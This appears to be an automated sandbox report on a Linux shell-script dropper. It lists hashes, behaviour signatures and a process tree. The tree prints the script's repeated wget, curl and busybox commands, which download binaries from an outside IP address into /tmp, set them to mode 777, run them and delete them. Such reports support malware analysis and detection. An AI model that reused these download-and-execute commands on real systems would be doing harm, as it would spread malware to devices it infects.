Analysis
-
max time kernel
78s -
max time network
79s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 733 chmod 865 chmod 967 chmod 836 chmod 853 chmod 859 chmod 889 chmod 907 chmod 913 chmod 949 chmod 802 chmod 877 chmod 883 chmod 925 chmod 743 chmod 766 chmod 809 chmod 901 chmod 961 chmod 973 chmod 931 chmod 943 chmod 919 chmod 937 chmod 796 chmod 871 chmod 895 chmod 955 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 734 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 744 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ 768 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR 797 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD 803 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr 810 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD 837 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a 854 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP 860 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY 866 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT 872 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel 878 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 884 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu 890 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP 896 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr 902 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD 908 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a 914 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu 920 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY 926 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT 932 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel 938 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 944 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 950 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 956 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD 962 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ 968 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR 974 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu curl File opened for modification /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY curl File opened for modification /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ curl File opened for modification /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr curl File opened for modification /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR curl File opened for modification /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel curl File opened for modification /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 curl File opened for modification /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD curl File opened for modification /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ curl File opened for modification /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu curl File opened for modification /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 curl File opened for modification /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT curl File opened for modification /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 curl File opened for modification /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a curl File opened for modification /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP curl File opened for modification /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr curl File opened for modification /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR curl File opened for modification /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT curl File opened for modification /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel curl File opened for modification /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 curl File opened for modification /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 curl File opened for modification /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 curl File opened for modification /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY curl File opened for modification /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD curl File opened for modification /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a curl File opened for modification /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD curl File opened for modification /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD curl File opened for modification /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP curl
Processes
-
/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:732
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:738
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:760
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:793
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:801
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:807
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:830
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:852
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:858
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:864
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:870
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:876
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:882
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:888
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:894
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:900
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:906
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:912
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:918
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:924
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:930
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:933
-
-
